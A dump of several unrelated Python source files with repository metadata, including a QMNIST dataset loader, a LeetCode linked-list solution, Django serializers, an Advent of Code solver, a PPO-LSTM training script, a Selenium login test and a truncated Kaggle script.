train (bool,optional,compatibility): When argument 'what' is
not specified, this boolean decides whether to load the
training set ot the testing set. Default: True.
"""
subsets = {
'train': 'train',
'test': 'test',
'test10k': 'test',
'test50k': 'test',
'nist': 'nist'
}
resources = {
'train': [('https://raw.githubusercontent.com/facebookresearch/qmnist/master/qmnist-train-images-idx3-ubyte.gz',
'ed72d4157d28c017586c42bc6afe6370'),
('https://raw.githubusercontent.com/facebookresearch/qmnist/master/qmnist-train-labels-idx2-int.gz',
'0058f8dd561b90ffdd0f734c6a30e5e4')],
'test': [('https://raw.githubusercontent.com/facebookresearch/qmnist/master/qmnist-test-images-idx3-ubyte.gz',
'1394631089c404de565df7b7aeaf9412'),
('https://raw.githubusercontent.com/facebookresearch/qmnist/master/qmnist-test-labels-idx2-int.gz',
'5b5b05890a5e13444e108efe57b788aa')],
'nist': [('https://raw.githubusercontent.com/facebookresearch/qmnist/master/xnist-images-idx3-ubyte.xz',
'7f124b3b8ab81486c9d8c2749c17f834'),
('https://raw.githubusercontent.com/facebookresearch/qmnist/master/xnist-labels-idx2-int.xz',
'5ed0e788978e45d4a8bd4b7caec3d79d')]
}
classes = ['0 - zero', '1 - one', '2 - two', '3 - three', '4 - four',
'5 - five', '6 - six', '7 - seven', '8 - eight', '9 - nine']
def __init__(self, root, what=None, compat=True, train=True, **kwargs):
if what is None:
what = 'train' if train else 'test'
self.what = verify_str_arg(what, "what", tuple(self.subsets.keys()))
self.compat = compat
self.data_file = what + '.pt'
self.training_file = self.data_file
self.test_file = self.data_file
super(QMNIST, self).__init__(root, train, **kwargs)
def download(self):
"""Download the QMNIST data if it doesn't exist in processed_folder already.
Note that we only download what has been asked for (argument 'what').
"""
if self._check_exists():
return
os.makedirs(self.raw_folder, exist_ok=True)
os.makedirs(self.processed_folder, exist_ok=True)
split = self.resources[self.subsets[self.what]]
files = []
# download data files if not already there
for url, md5 in split:
filename = url.rpartition('/')[2]
file_path = os.path.join(self.raw_folder, filename)
if not os.path.isfile(file_path):
download_url(url, root=self.raw_folder, filename=filename, md5=md5)
files.append(file_path)
# process and save as torch files
print('Processing...')
data = read_sn3_pascalvincent_tensor(files[0])
assert(data.dtype == torch.uint8)
assert(data.ndimension() == 3)
targets = read_sn3_pascalvincent_tensor(files[1]).long()
assert(targets.ndimension() == 2)
if self.what == 'test10k':
data = data[0:10000, :, :].clone()
targets = targets[0:10000, :].clone()
if self.what == 'test50k':
data = data[10000:, :, :].clone()
targets = targets[10000:, :].clone()
with open(os.path.join(self.processed_folder, self.data_file), 'wb') as f:
torch.save((data, targets), f)
def __getitem__(self, index):
# redefined to handle the compat flag
img, target = self.data[index], self.targets[index]
img = Image.fromarray(img.numpy(), mode='L')
if self.transform is not None:
img = self.transform(img)
if self.compat:
target = int(target[0])
if self.target_transform is not None:
target = self.target_transform(target)
return img, target
def extra_repr(self):
return "Split: {}".format(self.what)
def get_int(b):
return int(codecs.encode(b, 'hex'), 16)
def open_maybe_compressed_file(path):
"""Return a file object that possibly decompresses 'path' on the fly.
Decompression occurs when argument `path` is a string and ends with '.gz' or '.xz'.
"""
if not isinstance(path, torch._six.string_classes):
return path
if path.endswith('.gz'):
import gzip
return gzip.open(path, 'rb')
if path.endswith('.xz'):
import lzma
return lzma.open(path, 'rb')
return open(path, 'rb')
def read_sn3_pascalvincent_tensor(path, strict=True):
"""Read a SN3 file in "Pascal Vincent" format (Lush file 'libidx/idx-io.lsh').
Argument may be a filename, compressed filename, or file object.
"""
# typemap
if not hasattr(read_sn3_pascalvincent_tensor, 'typemap'):
read_sn3_pascalvincent_tensor.typemap = {
8: (torch.uint8, np.uint8, np.uint8),
9: (torch.int8, np.int8, np.int8),
11: (torch.int16, np.dtype('>i2'), 'i2'),
12: (torch.int32, np.dtype('>i4'), 'i4'),
13: (torch.float32, np.dtype('>f4'), 'f4'),
14: (torch.float64, np.dtype('>f8'), 'f8')}
# read
with open_maybe_compressed_file(path) as f:
data = f.read()
# parse
magic = get_int(data[0:4])
nd = magic % 256
ty = magic // 256
assert nd >= 1 and nd <= 3
assert ty >= 8 and ty <= 14
m = read_sn3_pascalvincent_tensor.typemap[ty]
s = [get_int(data[4 * (i + 1): 4 * (i + 2)]) for i in range(nd)]
parsed = np.frombuffer(data, dtype=m[1], offset=(4 * (nd + 1)))
assert parsed.shape[0] == np.prod(s) or not strict
return torch.from_numpy(parsed.astype(m[2], copy=False)).view(*s)
def read_label_file(path):
with open(path, 'rb') as f:
x = read_sn3_pascalvincent_tensor(f, strict=False)
assert(x.dtype == torch.uint8)
assert(x.ndimension() == 1)
return x.long()
def read_image_file(path):
with open(path, 'rb') as f:
x = read_sn3_pascalvincent_tensor(f, strict=False)
assert(x.dtype == torch.uint8)
assert(x.ndimension() == 3)
return x
| [
"noreply@github.com"
] | noreply@github.com |
6c351742ccd9c3c58c9a7048ff2f0434e916f76c | 04ae1836b9bc9d73d244f91b8f7fbf1bbc58ff29 | /019/Solution.py | 77b23c403e0c7749e27a5927c92d8dbf83f175dd | [] | no_license | zhangruochi/leetcode | 6f739fde222c298bae1c68236d980bd29c33b1c6 | cefa2f08667de4d2973274de3ff29a31a7d25eda | refs/heads/master | 2022-07-16T23:40:20.458105 | 2022-06-02T18:25:35 | 2022-06-02T18:25:35 | 78,989,941 | 14 | 6 | null | null | null | null | UTF-8 | Python | false | false | 2,040 | py | """
Given a linked list, remove the n-th node from the end of list and return its head.
Example:
Given linked list: 1->2->3->4->5, and n = 2.
After removing the second node from the end, the linked list becomes 1->2->3->5.
Note:
Given n will always be valid.
Follow up:
Could you do this in one pass?
"""
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def removeNthFromEnd(self, head, n):
"""
:type head: ListNode
:type n: int
:rtype: ListNode
"""
dummy = ListNode(0)
dummy.next = head
slow = quick = dummy
while quick:
if n >= 0:
n -= 1
quick = quick.next
else:
quick = quick.next
slow = slow.next
slow.next = slow.next.next
return dummy.next
class Solution(object):
def removeNthFromEnd(self, head, n):
"""
:type head: ListNode
:type n: int
:rtype: ListNode
"""
dummy = ListNode(0)
dummy.next = head
count, p = 0, dummy
while p:
count += 1
p = p.next
k = count - n - 1
p = dummy
while k:
p = p.next
k -= 1
p.next = p.next.next
return dummy.next
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, val=0, next=None):
# self.val = val
# self.next = next
class Solution:
def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:
m = 0
cur = head
while cur:
m += 1
cur = cur.next
n = m - n
dummy = cur = ListNode()
dummy.next = head
while n:
cur = cur.next
n-=1
cur.next = cur.next.next
return dummy.next
| [
"zrc720@gmail.com"
] | zrc720@gmail.com |
f06e528e1260ebc5a1753691b630761e596736d9 | 0f764a53f94ba7ad04094323a770237f2f2f1d2e | /api/serializers.py | 1464af362f0ad0255df0ef2e96befa35837f96e8 | [] | no_license | prafullkumar41/ProductApi | c302d60f526e2cb5e1cbb04bed19c88ce220a945 | 873ce2fc52cb8f72109ab857b1b90c2406147a0d | refs/heads/master | 2022-12-16T22:39:23.790371 | 2020-09-12T12:18:10 | 2020-09-12T12:18:10 | 294,936,100 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 851 | py | from rest_framework import serializers
from .models import Movie, Rating
from django.contrib.auth.models import User
from rest_framework.authtoken.models import Token
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ('id' ,'username', 'password')
extra_kwargs = {'password': {'write_only': True, 'required': True}}
def create(self, validated_data):
user = User.objects.create_user(**validated_data)
Token.objects.create(user=user)
return user
class MovieSerializer(serializers.ModelSerializer):
class Meta:
model = Movie
fields = ('id' ,'title', 'description', 'no_of_ratings', 'avg_rating')
class RatingSerializer(serializers.ModelSerializer):
class Meta:
model = Rating
fields = ('id' ,'movie', 'stars', 'user') | [
"prafullkumar41@gmail.com"
] | prafullkumar41@gmail.com |
4a027ec74eb4d35e5ab9f5de6328565278802070 | 4e77e00512d56ed7a66be0a6bb9eac428bef3a24 | /day16.py | 0bc37349d875da393d2b989dfc00a365d2452f30 | [] | no_license | russford/advent2020 | 54b38c3280a4e7fc7536dc3f8b8915cfba90daf3 | 585f1f07446130c60616aca61e5a87df01ef3689 | refs/heads/master | 2023-02-20T07:32:59.818544 | 2021-01-21T17:14:08 | 2021-01-21T17:14:08 | 317,603,139 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,257 | py | import re
def part1 (rules, my_ticket, tickets):
numbers = list(map(int, re.findall("\d+", rules)))
brackets = list(zip(numbers[::2], numbers[1::2]))
invalids = []
for v in map(int, re.findall("\d+", tickets)):
if not any ([low <= v <= high for low, high in brackets]):
invalids.append(v)
print (sum(invalids))
def is_valid (ticket, brackets):
return all([any([l <= v <= h for l, h in brackets]) for v in ticket])
def get_valid_tickets (rules, my_ticket, tickets):
all_tickets = [list(map(int, l.split(','))) for l in my_ticket.split('\n')[1:] + tickets.split('\n')[1:]]
numbers = list(map(int, re.findall("\d+", rules)))
brackets = list(zip(numbers[::2], numbers[1::2]))
# return [list(t) for t in filter(lambda t: is_valid(t, brackets), all_tickets)]
return list(filter(lambda t: is_valid(t, brackets), all_tickets))
def build_rules (rules_list):
return {g[0]:list(map(int,g[1:])) for g in re.findall("(.+): (\d+)-(\d+) or (\d+)-(\d+)", rules_list) }
def check_range(v, rule):
try:
return rule[0] <= v <= rule[1] or rule[2] <= v <= rule[3]
except Exception as e:
print (v, rule)
raise e
def part2 (rules_list, my_ticket, tickets):
rules = build_rules(rules_list)
tickets = get_valid_tickets(rules_list, my_ticket, tickets)
matchup = {}
for field in rules.keys():
matchup[field] = []
for i in range(len(rules)):
if all([check_range(t[i], rules[field]) for t in tickets]):
matchup[field].append(i)
matches = {}
while len(matches) < len(rules):
for field, poss in matchup.items():
if len(poss) == 1:
match = poss[0]
matches[field] = match
for list in matchup.values():
if match in list: list.remove(match)
product = 1
for field, column in matches.items():
if field.startswith("departure"):
print (field, tickets[0][column])
product *= tickets[0][column]
print (product)
with open ("day16.txt", "r") as f:
rules_list, my_ticket, tickets = f.read().split('\n\n')
part1(rules_list, my_ticket, tickets)
part2(rules_list, my_ticket, tickets)
| [
"russford@gmail.com"
] | russford@gmail.com |
1a89ac9ba7ddc69c93081fde340c991f34163b5b | cbe7f16751b5dd258cff6c1edb6c07f8b91529dd | /main.py | 025dc6265394fa9b4c7e99ca1a67a9692684e84a | [] | no_license | ViktoryLoktionova/Bidirectional_RNN | 4572f52d78388983234c6c6fe76955126dac8e5d | 22314b7cf799bd53375e9711fed2932f8749f111 | refs/heads/master | 2023-06-30T23:47:18.924718 | 2021-08-03T14:24:23 | 2021-08-03T14:24:23 | 392,339,725 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,776 | py | import numpy as np
import re
from tensorflow.keras.layers import Dense, SimpleRNN, Input
from tensorflow.keras.models import Sequential
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.preprocessing.text import Tokenizer
import numpy as np
import matplotlib.pyplot as plt
from tensorflow.keras.layers import Dense, GRU, Input, Dropout, Bidirectional
from tensorflow.keras.models import Sequential
from tensorflow.keras.optimizers import Adam
N = 10000 #формируем синусоиду со случайным шумом
data = np.array([np.sin(x/20)for x in range (N)])+ 0.1*np.random.randn(N)
plt.plot(data[:100])
off = 3 #формируем обучающую выборку определяем, сколько отсчетов будет
length = off*2+1
X= np.array([np.diag(np.hstack((data[i:i+off], data[i+off+1:i+length]))) for i in range(N-length)]) #входные значения
Y= data[off:N-off-1] #требуемые выходные. Метод diag создает диагональную матрицу.
print(X.shape, Y.shape, sep ='\n')
model = Sequential()
model.add(Input((length-1, length-1)))
model.add(Bidirectional(GRU(2)) ) #двунаправленный слой
model.add(Dense(1, activation='linear'))
model.summary()
model.compile(loss = 'mean_squared_error', optimizer = Adam(0.01)) #компилируем НС
histiry = model.fit(X, Y, batch_size=32, epochs=10)
M = 200 #делаем 200 прогнозов
XX = np.zeros(M)
XX[:off] = data[:off]
for i in range (M-off-1):
x = np.diag ( np.hstack( (XX[i:i+off], data[i+off+1:i+length])) ) #формируем входные данные для НС
x = np.expand_dims(x, axis=0)
y = model.predict(x)
XX[i+off] = y
plt.plot(XX[:M])
plt.plot(data[:M]) | [
"loktionova_viktory@mail.ru"
] | loktionova_viktory@mail.ru |
5f2ca36e61acddfdb4039e5b07fd900e04f868a8 | 332ba026303202f4aaf61dd88be55bd621e3c255 | /script_inspect_ckpt.py | 8877013ce9d46e67f459cda444892ff736ee566d | [
"Apache-2.0"
] | permissive | Li-Ming-Fan/pointer-generator-refactored | ea1d07cb0cca6c215524af057a80f32f51d2e4f2 | e4b2b62a791baf8373ce583850319f552f2f94e0 | refs/heads/master | 2020-07-21T08:39:45.601255 | 2020-01-06T14:42:17 | 2020-01-06T14:42:17 | 206,800,113 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,485 | py | """
Simple script that checks if a checkpoint is corrupted with any inf/NaN values.
Run like this:
python inspect_checkpoint.py model.12345
"""
import tensorflow as tf
import sys
import numpy as np
if __name__ == '__main__':
"""
"""
if len(sys.argv) != 2:
raise Exception("Usage: python inspect_checkpoint.py <file_name>\nNote: Do not include the .data .index or .meta part of the model checkpoint in file_name.")
#
file_name = sys.argv[1]
#
reader = tf.train.NewCheckpointReader(file_name)
var_to_shape_map = reader.get_variable_to_shape_map()
finite = []
all_infnan = []
some_infnan = []
for key in sorted(var_to_shape_map.keys()):
tensor = reader.get_tensor(key)
if np.all(np.isfinite(tensor)):
finite.append(key)
else:
if not np.any(np.isfinite(tensor)):
all_infnan.append(key)
else:
some_infnan.append(key)
print("\nFINITE VARIABLES:")
for key in finite: print(key)
print("\nVARIABLES THAT ARE ALL INF/NAN:")
for key in all_infnan: print(key)
print("\nVARIABLES THAT CONTAIN SOME FINITE, SOME INF/NAN VALUES:")
for key in some_infnan: print(key)
if not all_infnan and not some_infnan:
print("CHECK PASSED: checkpoint contains no inf/NaN values")
else:
print("CHECK FAILED: checkpoint contains some inf/NaN values")
| [
"li_m_f@163.com"
] | li_m_f@163.com |
cb71b7819ba6ef1dbdd577e63c2dd7dca07bdb3b | dbf770eef8233f7da1850309cc4b7145bd8d67f1 | /PYTHON-ADVANCED-SEPT-2020/PYTHON OOP/09_DECORATORS/LAB/passing_args.py | 7601d8b2620bd3eaac6ce6d8c978e2ae2f3870b9 | [] | no_license | vasil-panoff/PYTHON-ADVANCED-SEPT-2020_repo | 610a37d1681ce9d0aa86628523620e1571b438dd | c63434f91de42d2f1241b6d76a96c7c63711c1d0 | refs/heads/master | 2023-03-22T07:44:53.620221 | 2021-03-15T20:42:14 | 2021-03-15T20:42:14 | 309,829,800 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 237 | py | def repeat(n):
def decorator(func):
def wrapper(*args, **kwargs):
for _ in range(n):
func(*args, **kwargs)
return wrapper
return decorator
@repeat(4)
def say_hi():
print("Hello")
| [
"73856636+vasil-panoff@users.noreply.github.com"
] | 73856636+vasil-panoff@users.noreply.github.com |
90e3657df6220725bd0d4318738ca8eefadda3b0 | c31fd5ff52a0cf5bdf85a631914dfbafbfd68bb9 | /ppo_lstm2.py | c69418adadcf8bd0b9ef3243688fe2d3bdb79ef1 | [] | no_license | ziaoang/RlTest | 4307b3d7f58dd6f81de1f7cd17298c517c274564 | 4d81e69b27023d008ca081063c7a154fb5b2451c | refs/heads/main | 2023-08-05T01:32:14.288041 | 2021-10-09T02:58:32 | 2021-10-09T02:58:32 | 403,208,412 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 10,015 | py | import numpy as np
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
import gym
import scipy.signal
import time
def discounted_cumulative_sums(x, discount):
# Discounted cumulative sums of vectors for computing rewards-to-go and advantage estimates
return scipy.signal.lfilter([1], [1, float(-discount)], x[::-1], axis=0)[::-1]
class Queue(object):
def __init__(self, size):
self.size = size
self.data_list = []
def push(self, data):
# print('ziaoang->data', type(data), data.shape)
assert len(self.data_list) <= self.size
self.data_list.append(data)
if len(self.data_list) > self.size:
self.data_list.pop(0)
return self._get()
def _get(self):
assert len(self.data_list) <= self.size
result = []
for i in range(self.size - len(self.data_list)):
result.append(np.zeros(self.data_list[0].shape[0]))
result.extend(self.data_list)
result = np.array(result)
result = np.expand_dims(result, 0)
return result
class Buffer(object):
# Buffer for storing trajectories
def __init__(self, timestep, observation_dimensions, size, gamma=0.99, lam=0.95):
# Buffer initialization
self.observation_buffer = np.zeros(
(size, timestep, observation_dimensions), dtype=np.float32
)
self.action_buffer = np.zeros(size, dtype=np.int32)
self.advantage_buffer = np.zeros(size, dtype=np.float32)
self.reward_buffer = np.zeros(size, dtype=np.float32)
self.return_buffer = np.zeros(size, dtype=np.float32)
self.value_buffer = np.zeros(size, dtype=np.float32)
self.logprobability_buffer = np.zeros(size, dtype=np.float32)
self.gamma, self.lam = gamma, lam
self.pointer, self.trajectory_start_index = 0, 0
def store(self, observation, action, reward, value, logprobability):
# Append one step of agent-environment interaction
self.observation_buffer[self.pointer] = observation
self.action_buffer[self.pointer] = action
self.reward_buffer[self.pointer] = reward
self.value_buffer[self.pointer] = value
self.logprobability_buffer[self.pointer] = logprobability
self.pointer += 1
def finish_trajectory(self, last_value=0):
# Finish the trajectory by computing advantage estimates and rewards-to-go
path_slice = slice(self.trajectory_start_index, self.pointer)
rewards = np.append(self.reward_buffer[path_slice], last_value)
values = np.append(self.value_buffer[path_slice], last_value)
deltas = rewards[:-1] + self.gamma * values[1:] - values[:-1]
self.advantage_buffer[path_slice] = discounted_cumulative_sums(
deltas, self.gamma * self.lam
)
self.return_buffer[path_slice] = discounted_cumulative_sums(
rewards, self.gamma
)[:-1]
self.trajectory_start_index = self.pointer
def get(self):
# Get all data of the buffer and normalize the advantages
self.pointer, self.trajectory_start_index = 0, 0
advantage_mean, advantage_std = (
np.mean(self.advantage_buffer),
np.std(self.advantage_buffer),
)
self.advantage_buffer = (self.advantage_buffer - advantage_mean) / advantage_std
return (
self.observation_buffer,
self.action_buffer,
self.advantage_buffer,
self.return_buffer,
self.logprobability_buffer,
)
def mlp(x, lstm_size, sizes, activation=tf.tanh, output_activation=None):
# Build a feedforward neural network
x = layers.LSTM(lstm_size)(x)
for size in sizes[:-1]:
x = layers.Dense(units=size, activation=activation)(x)
return layers.Dense(units=sizes[-1], activation=output_activation)(x)
def logprobabilities(logits, a):
# Compute the log-probabilities of taking actions a by using the logits (i.e. the output of the actor)
logprobabilities_all = tf.nn.log_softmax(logits)
logprobability = tf.reduce_sum(
tf.one_hot(a, num_actions) * logprobabilities_all, axis=1
)
return logprobability
# Sample action from actor
@tf.function
def sample_action(observation):
logits = actor(observation)
action = tf.squeeze(tf.random.categorical(logits, 1), axis=1)
return logits, action
# Train the policy by maxizing the PPO-Clip objective
@tf.function
def train_policy(observation_buffer, action_buffer, logprobability_buffer, advantage_buffer):
with tf.GradientTape() as tape: # Record operations for automatic differentiation.
ratio = tf.exp(
logprobabilities(actor(observation_buffer), action_buffer)
- logprobability_buffer
)
min_advantage = tf.where(
advantage_buffer > 0,
(1 + clip_ratio) * advantage_buffer,
(1 - clip_ratio) * advantage_buffer,
)
policy_loss = -tf.reduce_mean(
tf.minimum(ratio * advantage_buffer, min_advantage)
)
policy_grads = tape.gradient(policy_loss, actor.trainable_variables)
policy_optimizer.apply_gradients(zip(policy_grads, actor.trainable_variables))
kl = tf.reduce_mean(
logprobability_buffer
- logprobabilities(actor(observation_buffer), action_buffer)
)
kl = tf.reduce_sum(kl)
return kl
# Train the value function by regression on mean-squared error
@tf.function
def train_value_function(observation_buffer, return_buffer):
with tf.GradientTape() as tape: # Record operations for automatic differentiation.
value_loss = tf.reduce_mean((return_buffer - critic(observation_buffer)) ** 2)
value_grads = tape.gradient(value_loss, critic.trainable_variables)
value_optimizer.apply_gradients(zip(value_grads, critic.trainable_variables))
# Hyperparameters of the PPO algorithm
steps_per_epoch = 4000
epochs = 30
gamma = 0.99
clip_ratio = 0.2
policy_learning_rate = 3e-4
value_function_learning_rate = 1e-3
train_policy_iterations = 80
train_value_iterations = 80
lam = 0.97
target_kl = 0.01
hidden_sizes = (64, 64)
# True if you want to render the environment
render = False
# Initialize the environment and get the dimensionality of the
# observation space and the number of possible actions
env = gym.make("CartPole-v0")
observation_dimensions = env.observation_space.shape[0]
num_actions = env.action_space.n
timestep = 8
lstm_size = 64
# Initialize the buffer
buffer = Buffer(timestep, observation_dimensions, steps_per_epoch)
# Initialize the actor and the critic as keras models
observation_input = keras.Input(shape=(timestep, observation_dimensions), dtype=tf.float32)
logits = mlp(observation_input, lstm_size, list(hidden_sizes) + [num_actions], tf.tanh, None)
actor = keras.Model(inputs=observation_input, outputs=logits)
value = tf.squeeze(
mlp(observation_input, lstm_size, list(hidden_sizes) + [1], tf.tanh, None), axis=1
)
critic = keras.Model(inputs=observation_input, outputs=value)
actor.summary()
critic.summary()
# Initialize the policy and the value function optimizers
policy_optimizer = keras.optimizers.Adam(learning_rate=policy_learning_rate)
value_optimizer = keras.optimizers.Adam(learning_rate=value_function_learning_rate)
# Initialize the observation, episode return and episode length
observation, episode_return, episode_length = env.reset(), 0, 0
observations = Queue(timestep)
# Iterate over the number of epochs
for epoch in range(epochs):
# Initialize the sum of the returns, lengths and number of episodes for each epoch
sum_return = 0
sum_length = 0
num_episodes = 0
# Iterate over the steps of each epoch
for t in range(steps_per_epoch):
if render:
env.render()
# Get the logits, action, and take one step in the environment
# observation = observation.reshape(1, -1)
adv_observation = observations.push(observation)
# print('ziaoang->old size', observation.shape)
# print('ziaoang->new size', adv_observation.shape)
logits, action = sample_action(adv_observation)
observation_new, reward, done, _ = env.step(action[0].numpy())
episode_return += reward
episode_length += 1
# Get the value and log-probability of the action
value_t = critic(adv_observation)
logprobability_t = logprobabilities(logits, action)
# Store obs, act, rew, v_t, logp_pi_t
buffer.store(adv_observation, action, reward, value_t, logprobability_t)
# Update the observation
observation = observation_new
# Finish trajectory if reached to a terminal state
terminal = done
if terminal or (t == steps_per_epoch - 1):
last_value = 0 if done else critic(observations.push(observation))
buffer.finish_trajectory(last_value)
sum_return += episode_return
sum_length += episode_length
num_episodes += 1
observation, episode_return, episode_length = env.reset(), 0, 0
observations = Queue(timestep)
# Get values from the buffer
(
observation_buffer,
action_buffer,
advantage_buffer,
return_buffer,
logprobability_buffer,
) = buffer.get()
# Update the policy and implement early stopping using KL divergence
for _ in range(train_policy_iterations):
kl = train_policy(
observation_buffer, action_buffer, logprobability_buffer, advantage_buffer
)
if kl > 1.5 * target_kl:
# Early Stopping
break
# Update the value function
for _ in range(train_value_iterations):
train_value_function(observation_buffer, return_buffer)
# Print mean return and length for each epoch
print(f" Epoch: {epoch + 1}. Mean Return: {sum_return / num_episodes}. Mean Length: {sum_length / num_episodes}")
| [
"lcn6767@corp.netease.com"
] | lcn6767@corp.netease.com |
0ff0a0f62d90db80fcdadf06d3684dbbad7a0af1 | bae76a8e1d2fdefdd660f44b770ddbdb8184d682 | /les_1/test1.py | a047e6ff503f70e1f25cad5ff399132ebd7dd1a3 | [] | no_license | a-chernyshova/selenium_test_practice | 0024f32d1022bfb6f1fbdb87ae99b907a6dffa7c | 927b99e9a43f6e453348f9cd1db67d9e59b003bf | refs/heads/master | 2021-06-18T07:52:10.098499 | 2017-07-07T20:02:07 | 2017-07-07T20:02:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,040 | py | import pytest
from selenium import webdriver
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
URL = 'http://localhost:8080/litecart/admin'
LOGIN = 'admin'
PASSWORD = 'admin'
def login(url, login, password):
global browser
browser = webdriver.Firefox()
#browser = webdriver.Chrome()
#browser = webdriver.Ie()
#browser = webdriver.Opera()
#browser = webdriver.Edge()
#browser = webdriver.Firefox(capabilities={"marionette": False}) # old fashion
#browser = webdriver.Firefox(firefox_binary="c:\\Program Files\\Firefox45\\firefox.exe",
# capabilities={"marionette": False})
#browser = webdriver.Firefox(firefox_binary="c:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe",
# capabilities={"marionette": True})
#browser = webdriver.Firefox(firefox_binary='C:\\Program Files(x86)\\Firefox Developer Edition\\firefox.exe')
#browser = webdriver.Firefox(firefox_binary="c:\\Program Files(x86)\\Nightly\\firefox.exe")
browser.get(url)
browser.find_element_by_name('username').send_keys(login)
browser.find_element_by_name('password').send_keys(password)
browser.find_element_by_name('login').click()
return browser
def work_with_coockies(browser):
print(browser.get_cookies())
browser.delete_all_cookies()
print(browser.get_cookies())
browser.refresh()
def close(browser):
browser.quit()
@pytest.fixture
def driver(request):
wd = webdriver.Firefox()
print(wd.capabilities)
request.addfinalizer(wd.quit)
return wd
def test_first(driver):
driver.get("http://www.google.com/")
driver.find_element_by_name("q").send_keys("webdriver")
driver.find_element_by_name("btnG").click()
WebDriverWait(driver, 10).until(EC.title_is("webdriver - Поиск в Google"))
if __name__ == '__main__':
try:
work_with_coockies(login(URL, LOGIN, PASSWORD))
finally:
close(browser)
| [
"stasya.aska@gmail.com"
] | stasya.aska@gmail.com |
9275c08651f55414d12b7fc3bebe3109ef994156 | 1e505f77fa2509e79716b21088ed3a2a57cda73c | /logger.py | 3908636ff5a76c7f73c0702d9ff993d74da7d2dc | [] | no_license | sapph1re/tri-arb | 523cc44ad0760c200ac48cc8487de2539e612b8d | df34e06af0f0c4264b32b022a9509bf1b92348df | refs/heads/master | 2022-10-23T15:51:38.812783 | 2020-02-22T04:30:43 | 2020-02-22T04:30:43 | 131,799,758 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,096 | py | import logging
# from logging.handlers import RotatingFileHandler
# log_formatter_debug = logging.Formatter(
# '%(asctime)s\t%(levelname)s\t[%(filename)s:%(lineno)s <> '
# '%(funcName)s() <> %(threadName)s]\n%(message)s\n'
# )
# handler_debug = RotatingFileHandler('debug.log', mode='a', maxBytes=10000000)
# handler_debug.setLevel(logging.DEBUG)
# handler_debug.setFormatter(log_formatter_debug)
log_formatter_info = logging.Formatter('%(asctime)s\t%(levelname)s\t[%(filename)s]\t%(message)s')
handler_console = logging.StreamHandler()
handler_console.setLevel(logging.INFO)
handler_console.setFormatter(log_formatter_info)
def get_logger(name):
"""
Usage: logger = get_logger(__name__)
logger.info('Some log message here')
:param name: logger name, usually __name__ is fine
:return: logger
"""
logger = logging.getLogger(name)
logger.setLevel(logging.DEBUG)
# writing a detailed debug log to debug.log file
# logger.addHandler(handler_debug)
# writing a general log to console
logger.addHandler(handler_console)
return logger
| [
"dev.romanv@gmail.com"
] | dev.romanv@gmail.com |
b5837f8a5f00ad64d1fc1222080e6c5bfe305010 | 185b63f708319f7fcb6a3ef3ad7036d4a2ee169d | /l9-example-02a.py | 14c96dc7b76f51155953164abab5a00e5114f928 | [] | no_license | yipeichan/Numerical_Ananlysis_and_Programming | 222cdcaf62281ad0c3348b304c6f3addb53e2353 | 13175dbc3e30a376f1c5c94f1b54df6fad3f0aa6 | refs/heads/master | 2020-04-02T03:48:29.523292 | 2018-10-21T08:04:24 | 2018-10-21T08:04:24 | 153,985,352 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 664 | py | import numpy as np
import timeit
def det_rec(A):
if A.shape==(2,2): return A[0,0]*A[1,1]-A[0,1]*A[1,0]
det = 0.
reduced = np.zeros((A.shape[0]-1,A.shape[1]-1))
for i in range(A.shape[1]):
reduced[:,:i] = A[1:,:i]
reduced[:,i:] = A[1:,i+1:]
r = A[0,i]*det_rec(reduced)
if i % 2==1: det -= r
else: det += r
return det
def speed_test(n):
A = np.random.rand(n**2).reshape((n,n))
print '|A('+str(n)+'x'+str(n)+')| =',det_rec(A)
for n in range(2,11):
t = timeit.timeit('speed_test('+str(n)+')',
'from __main__ import speed_test',number=1)
print '%.6f sec.\n' % t
| [
"noreply@github.com"
] | noreply@github.com |
dbe2f2833ba59cdba2a81d016967678ea2a4dc25 | 14b0395a375b443377922338b1a50c034d787617 | /main.py | e67becf45113de93bccd6e88904fa763ee360bda | [] | no_license | fucusy/kaggle-state-farm-distracted-driver-detection | 43d4d798069b10b577fad04fc866959d8a9f9823 | 81631f1d1c58767398501cc801a7d93b27e08682 | refs/heads/master | 2021-01-14T13:37:02.493061 | 2016-07-13T07:50:17 | 2016-07-13T07:50:34 | 58,187,723 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,643 | py | __author__ = 'fucus'
import os
from tool.keras_tool import load_data
import logging
import sys
import datetime
import config
from config import Project
from feature.utility import load_train_validation_feature
from feature.utility import load_test_feature
from tool.file import generate_result_file
from feature.utility import load_cache
from feature.utility import load_feature_from_pickle
from feature.utility import save_cache
from sklearn.metrics import classification_report
from sklearn.metrics import log_loss
import numpy as np
cache_path = "%s/cache" % Project.project_path
if __name__ == '__main__':
level = logging.DEBUG
FORMAT = '%(asctime)-12s[%(levelname)s] %(message)s'
logging.basicConfig(level=level, format=FORMAT, datefmt='%Y-%m-%d %H:%M:%S')
start_time = datetime.datetime.now()
logging.info('start program---------------------')
logging.info("loading feature cache now")
train_img_folder = "/home/chenqiang/kaggle_driver_test_data/imgs/train"
test_img_folder = "/home/chenqiang/kaggle_driver_test_data/imgs/test"
feature_dir_list = ["%s/vgg_feature_l_31/" % cache_path]
train_data, validation_data, test_data = load_data(train_img_folder, test_img_folder)
train_y = train_data.get_image_label(to_cate=False)
validation_y = validation_data.get_image_label(to_cate=False)
logging.info("train_y shape %s" % str(train_y.shape))
logging.info("validation_y shape %s" % str(validation_y.shape))
feature_list = [None, None]
for j, dataset in enumerate([train_data, validation_data]):
for i, path in enumerate(dataset.image_path_list):
x = np.array([])
img_base_name = os.path.basename(path)
